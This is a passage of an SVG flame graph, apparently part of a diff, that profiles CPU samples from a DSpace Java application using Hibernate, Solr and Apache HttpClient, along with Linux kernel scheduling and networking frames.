+<title>ktime_get (1 samples, 0.08%)</title><rect x="294.7" y="309" width="0.9" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="297.70" y="319.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (50 samples, 3.97%)</title><rect x="13.7" y="821" width="46.9" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="16.75" y="831.5" >do_s..</text>
+</g>
+<g >
+<title>java/util/ArrayList:::iterator (1 samples, 0.08%)</title><rect x="972.7" y="405" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="975.73" y="415.5" ></text>
+</g>
+<g >
+<title>java/util/HashSet:::add (2 samples, 0.16%)</title><rect x="1143.2" y="421" width="1.8" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1146.17" y="431.5" ></text>
+</g>
+<g >
+<title>java/io/IOException:::&lt;init&gt; (1 samples, 0.08%)</title><rect x="797.6" y="197" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="800.60" y="207.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/jdbc/internal/ResultSetReturnImpl:::extract (1 samples, 0.08%)</title><rect x="777.9" y="389" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.94" y="399.5" ></text>
+</g>
+<g >
+<title>perf_event_task_tick (1 samples, 0.08%)</title><rect x="223.5" y="261" width="1.0" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="226.52" y="271.5" ></text>
+</g>
+<g >
+<title>handle_fasteoi_irq (1 samples, 0.08%)</title><rect x="1124.4" y="373" width="1.0" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="1127.44" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareCollectionFlushes (10 samples, 0.79%)</title><rect x="960.6" y="421" width="9.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="963.56" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::hasQueuedOperations (1 samples, 0.08%)</title><rect x="669.3" y="469" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="672.30" y="479.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::resolve (1 samples, 0.08%)</title><rect x="785.4" y="405" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="788.43" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/content/InputStreamBody:::writeTo (1 samples, 0.08%)</title><rect x="797.6" y="309" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="800.60" y="319.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (11 samples, 0.87%)</title><rect x="766.7" y="501" width="10.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="769.70" y="511.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (2 samples, 0.16%)</title><rect x="996.1" y="389" width="1.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="999.14" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doQueryAndInitializeNonLazyCollections (1 samples, 0.08%)</title><rect x="783.6" y="437" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="786.56" y="447.5" ></text>
+</g>
+<g >
+<title>tcp_release_cb (1 samples, 0.08%)</title><rect x="62.4" y="725" width="1.0" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="65.44" y="735.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::doList (1 samples, 0.08%)</title><rect x="1004.6" y="453" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1007.57" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isComponentType (1 samples, 0.08%)</title><rect x="257.2" y="421" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="260.24" y="431.5" ></text>
+</g>
+<g >
+<title>java/lang/Object:::hashCode (10 samples, 0.79%)</title><rect x="822.9" y="405" width="9.4" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="825.89" y="415.5" ></text>
+</g>
+<g >
+<title>hrtimer_interrupt (1 samples, 0.08%)</title><rect x="158.0" y="373" width="0.9" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="160.97" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (1 samples, 0.08%)</title><rect x="756.4" y="469" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="759.40" y="479.5" ></text>
+</g>
+<g >
+<title>nf_hook_slow (9 samples, 0.71%)</title><rect x="101.8" y="405" width="8.4" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="104.78" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (8 samples, 0.63%)</title><rect x="1056.1" y="405" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1059.08" y="415.5" ></text>
+</g>
+<g >
+<title>call_stub (1 samples, 0.08%)</title><rect x="1161.9" y="277" width="0.9" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="1164.90" y="287.5" ></text>
+</g>
+<g >
+<title>load_balance (1 samples, 0.08%)</title><rect x="59.6" y="677" width="1.0" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="62.63" y="687.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultSaveOrUpdateEventListener:::onSaveOrUpdate (10 samples, 0.79%)</title><rect x="637.5" y="421" width="9.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="640.46" y="431.5" ></text>
+</g>
+<g >
+<title>java/lang/StringBuilder:::append (2 samples, 0.16%)</title><rect x="762.0" y="517" width="1.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="765.02" y="527.5" ></text>
+</g>
+<g >
+<title>hrtimer_interrupt (1 samples, 0.08%)</title><rect x="223.5" y="357" width="1.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="226.52" y="367.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionFactoryImpl:::getCollectionPersister (1 samples, 0.08%)</title><rect x="1002.7" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1005.70" y="415.5" ></text>
+</g>
+<g >
+<title>__hrtimer_run_queues (1 samples, 0.08%)</title><rect x="158.0" y="357" width="0.9" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="160.97" y="367.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketOutputStream_socketWrite0 (2 samples, 0.16%)</title><rect x="799.5" y="277" width="1.8" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="802.48" y="287.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="969.0" y="357" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="971.98" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (1 samples, 0.08%)</title><rect x="815.4" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="818.40" y="431.5" ></text>
+</g>
+<g >
+<title>net_rx_action (17 samples, 1.35%)</title><rect x="94.3" y="485" width="15.9" height="15.0" fill="rgb(246,117,117)" rx="2" ry="2" />
+<text  x="97.29" y="495.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (49 samples, 3.89%)</title><rect x="13.7" y="709" width="45.9" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="16.75" y="719.5" >fini..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (98 samples, 7.78%)</title><rect x="664.6" y="485" width="91.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="667.62" y="495.5" >org/hibern..</text>
+</g>
+<g >
+<title>java/net/SocketOutputStream:::socketWrite0 (1 samples, 0.08%)</title><rect x="313.4" y="405" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="316.43" y="415.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$CharProperty:::match (1 samples, 0.08%)</title><rect x="843.5" y="341" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="846.49" y="351.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/tree/DefaultExpressionEngine:::processSubNodes (2 samples, 0.16%)</title><rect x="866.0" y="437" width="1.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="868.97" y="447.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.08%)</title><rect x="80.2" y="629" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="83.24" y="639.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::sendRequestEntity (1 samples, 0.08%)</title><rect x="1149.7" y="389" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1152.73" y="399.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::list (151 samples, 11.98%)</title><rect x="871.6" y="485" width="141.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="874.59" y="495.5" >org/hibernate/int..</text>
+</g>
+<g >
+<title>org/hibernate/type/EntityType:::resolve (1 samples, 0.08%)</title><rect x="776.1" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="779.06" y="431.5" ></text>
+</g>
+<g >
+<title>ip_rcv (14 samples, 1.11%)</title><rect x="97.1" y="421" width="13.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="100.10" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultLoadEventListener:::onLoad (1 samples, 0.08%)</title><rect x="776.1" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="779.06" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/util/ClientUtils:::writeVal (5 samples, 0.40%)</title><rect x="805.1" y="405" width="4.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="808.10" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::immediateLoad (3 samples, 0.24%)</title><rect x="758.3" y="501" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="761.27" y="511.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration:::getProperty (1 samples, 0.08%)</title><rect x="1140.4" y="421" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1143.37" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/entity/AbstractEntityLoader:::load (3 samples, 0.24%)</title><rect x="758.3" y="389" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="761.27" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::rewriteRequestURI (3 samples, 0.24%)</title><rect x="812.6" y="421" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="815.59" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.16%)</title><rect x="1161.0" y="373" width="1.8" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1163.97" y="383.5" ></text>
+</g>
+<g >
+<title>acpi_ev_gpe_detect (1 samples, 0.08%)</title><rect x="1124.4" y="277" width="1.0" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="1127.44" y="287.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (4 samples, 0.32%)</title><rect x="10.0" y="693" width="3.7" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="13.00" y="703.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::execute (8 samples, 0.63%)</title><rect x="1155.3" y="453" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1158.35" y="463.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.08%)</title><rect x="818.2" y="373" width="0.9" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="821.21" y="383.5" ></text>
+</g>
+<g >
+<title>itable stub (3 samples, 0.24%)</title><rect x="1013.0" y="437" width="2.8" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="1016.00" y="447.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (1 samples, 0.08%)</title><rect x="843.5" y="469" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="846.49" y="479.5" ></text>
+</g>
+<g >
+<title>hrtimer_interrupt (1 samples, 0.08%)</title><rect x="384.6" y="389" width="0.9" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="387.60" y="399.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="817.3" y="165" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="820.27" y="175.5" ></text>
+</g>
+<g >
+<title>java/util/AbstractMap:::get (18 samples, 1.43%)</title><rect x="820.1" y="453" width="16.8" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="823.08" y="463.5" ></text>
+</g>
+<g >
+<title>itable stub (3 samples, 0.24%)</title><rect x="876.3" y="405" width="2.8" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="879.27" y="415.5" ></text>
+</g>
+<g >
+<title>psi_task_change (1 samples, 0.08%)</title><rect x="98.0" y="149" width="1.0" height="15.0" fill="rgb(238,105,105)" rx="2" ry="2" />
+<text  x="101.03" y="159.5" ></text>
+</g>
+<g >
+<title>__ip_queue_xmit (24 samples, 1.90%)</title><rect x="88.7" y="645" width="22.4" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="91.67" y="655.5" >_..</text>
+</g>
+<g >
+<title>org/hibernate/type/EntityType:::nullSafeGet (1 samples, 0.08%)</title><rect x="1164.7" y="533" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1167.71" y="543.5" ></text>
+</g>
+<g >
+<title>perf_event_update_userpage (1 samples, 0.08%)</title><rect x="13.7" y="581" width="1.0" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="16.75" y="591.5" ></text>
+</g>
+<g >
+<title>tick_program_event (1 samples, 0.08%)</title><rect x="294.7" y="325" width="0.9" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="297.70" y="335.5" ></text>
+</g>
+<g >
+<title>update_curr (1 samples, 0.08%)</title><rect x="518.5" y="293" width="1.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="521.52" y="303.5" ></text>
+</g>
+<g >
+<title>__check_object_size (1 samples, 0.08%)</title><rect x="84.0" y="741" width="0.9" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="86.98" y="751.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (1 samples, 0.08%)</title><rect x="733.0" y="437" width="0.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="735.98" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::getPersistenceContext (2 samples, 0.16%)</title><rect x="658.1" y="437" width="1.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="661.06" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::isDirty (1 samples, 0.08%)</title><rect x="325.6" y="453" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="328.60" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/spi/TypedValue:::hashCode (2 samples, 0.16%)</title><rect x="635.6" y="373" width="1.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="638.59" y="383.5" ></text>
+</g>
+<g >
+<title>JVM_IHashCode (1 samples, 0.08%)</title><rect x="779.8" y="325" width="0.9" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="782.81" y="335.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (10 samples, 0.79%)</title><rect x="914.7" y="389" width="9.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="917.67" y="399.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="789.2" y="325" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="792.17" y="335.5" ></text>
+</g>
+<g >
+<title>update_curr (1 samples, 0.08%)</title><rect x="115.8" y="741" width="1.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="118.83" y="751.5" ></text>
+</g>
+<g >
+<title>intel_tfa_pmu_enable_all (1 samples, 0.08%)</title><rect x="223.5" y="213" width="1.0" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="226.52" y="223.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/jdbc/internal/ResultSetReturnImpl:::extract (1 samples, 0.08%)</title><rect x="313.4" y="453" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="316.43" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::checkTransactionSynchStatus (1 samples, 0.08%)</title><rect x="1003.6" y="405" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1006.63" y="415.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (4 samples, 0.32%)</title><rect x="857.5" y="357" width="3.8" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="860.54" y="367.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/WriterAppender:::subAppend (1 samples, 0.08%)</title><rect x="788.2" y="341" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="791.24" y="351.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::list (1 samples, 0.08%)</title><rect x="1004.6" y="469" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1007.57" y="479.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="1150.7" y="149" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1153.67" y="159.5" ></text>
+</g>
+<g >
+<title>jshort_arraycopy (1 samples, 0.08%)</title><rect x="1009.3" y="405" width="0.9" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="1012.25" y="415.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/DefaultSingletonBeanRegistry:::getSingleton (1 samples, 0.08%)</title><rect x="867.8" y="469" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="870.84" y="479.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Collection_$$_jvst437_11:::getName (1 samples, 0.08%)</title><rect x="777.0" y="405" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="780.00" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::withTemporarySessionIfNeeded (7 samples, 0.56%)</title><rect x="312.5" y="485" width="6.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="315.49" y="495.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="779.8" y="309" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="782.81" y="319.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::initializeBean (3 samples, 0.24%)</title><rect x="1135.7" y="437" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1138.68" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (142 samples, 11.27%)</title><rect x="871.6" y="437" width="133.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="874.59" y="447.5" >org/hibernate/ev..</text>
+</g>
+<g >
+<title>schedule (50 samples, 3.97%)</title><rect x="13.7" y="741" width="46.9" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="16.75" y="751.5" >sche..</text>
+</g>
+<g >
+<title>group_sched_in (1 samples, 0.08%)</title><rect x="13.7" y="613" width="1.0" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="16.75" y="623.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/PersistentList:::toArray (1 samples, 0.08%)</title><rect x="782.6" y="453" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="785.62" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::onFlushEntity (69 samples, 5.48%)</title><rect x="1028.9" y="421" width="64.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1031.92" y="431.5" >org/hib..</text>
+</g>
+<g >
+<title>update_process_times (1 samples, 0.08%)</title><rect x="87.7" y="581" width="1.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="90.73" y="591.5" ></text>
+</g>
+<g >
+<title>ttwu_do_activate (1 samples, 0.08%)</title><rect x="98.0" y="181" width="1.0" height="15.0" fill="rgb(227,90,90)" rx="2" ry="2" />
+<text  x="101.03" y="191.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::tryExecute (1 samples, 0.08%)</title><rect x="1149.7" y="437" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1152.73" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isDirty (2 samples, 0.16%)</title><rect x="1060.8" y="389" width="1.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1063.76" y="399.5" ></text>
+</g>
+<g >
+<title>tick_sched_do_timer (1 samples, 0.08%)</title><rect x="384.6" y="341" width="0.9" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="387.60" y="351.5" ></text>
+</g>
+<g >
+<title>org/dspace/eperson/Group_$$_jvst437_1e:::getHibernateLazyInitializer (1 samples, 0.08%)</title><rect x="950.3" y="373" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="953.25" y="383.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::resize (1 samples, 0.08%)</title><rect x="1140.4" y="357" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1143.37" y="367.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (1 samples, 0.08%)</title><rect x="1150.7" y="421" width="0.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1153.67" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="797.6" y="101" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="800.60" y="111.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (26 samples, 2.06%)</title><rect x="1165.7" y="821" width="24.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1168.65" y="831.5" >[..</text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor30:::invoke (1 samples, 0.08%)</title><rect x="870.7" y="453" width="0.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="873.65" y="463.5" ></text>
+</g>
+<g >
+<title>java/util/AbstractMap:::get (18 samples, 1.43%)</title><rect x="849.1" y="437" width="16.9" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="852.11" y="447.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/HibernateDBConnection:::uncacheEntity (130 samples, 10.32%)</title><rect x="1013.0" y="501" width="121.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1016.00" y="511.5" >org/dspace/core..</text>
+</g>
+<g >
+<title>org/hibernate/engine/spi/CascadeStyle:::hasOrphanDelete (1 samples, 0.08%)</title><rect x="1131.9" y="421" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1134.94" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/MapConfiguration:::getProperty (3 samples, 0.24%)</title><rect x="1142.2" y="469" width="2.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1145.24" y="479.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isDirty (1 samples, 0.08%)</title><rect x="187.9" y="389" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="190.94" y="399.5" ></text>
+</g>
+<g >
+<title>smp_apic_timer_interrupt (1 samples, 0.08%)</title><rect x="384.6" y="405" width="0.9" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="387.60" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::doExecute (8 samples, 0.63%)</title><rect x="1155.3" y="469" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1158.35" y="479.5" ></text>
+</g>
+<g >
+<title>hrtimer_interrupt (1 samples, 0.08%)</title><rect x="294.7" y="341" width="0.9" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="297.70" y="351.5" ></text>
+</g>
+<g >
+<title>run_rebalance_domains (2 samples, 0.16%)</title><rect x="1117.9" y="309" width="1.9" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="1120.89" y="319.5" ></text>
+</g>
+<g >
+<title>pick_next_task_fair (1 samples, 0.08%)</title><rect x="59.6" y="709" width="1.0" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="62.63" y="719.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::doSendRequest (1 samples, 0.08%)</title><rect x="1149.7" y="405" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1152.73" y="415.5" ></text>
+</g>
+<g >
+<title>__alloc_skb (2 samples, 0.16%)</title><rect x="86.8" y="709" width="1.9" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="89.79" y="719.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceImpl:::writeDocument (35 samples, 2.78%)</title><rect x="786.4" y="517" width="32.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="789.37" y="527.5" >or..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="790.1" y="293" width="0.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="793.11" y="303.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (1 samples, 0.08%)</title><rect x="756.4" y="453" width="0.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="759.40" y="463.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (2 samples, 0.16%)</title><rect x="1125.4" y="405" width="1.9" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="1128.38" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/FlushVisitor:::processCollection (14 samples, 1.11%)</title><rect x="1063.6" y="405" width="13.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1066.57" y="415.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.08%)</title><rect x="798.5" y="261" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="801.54" y="271.5" ></text>
+</g>
+<g >
+<title>__hrtimer_run_queues (1 samples, 0.08%)</title><rect x="384.6" y="373" width="0.9" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="387.60" y="383.5" ></text>
+</g>
+<g >
+<title>tick_sched_timer (1 samples, 0.08%)</title><rect x="990.5" y="277" width="1.0" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="993.52" y="287.5" ></text>
+</g>
+<g >
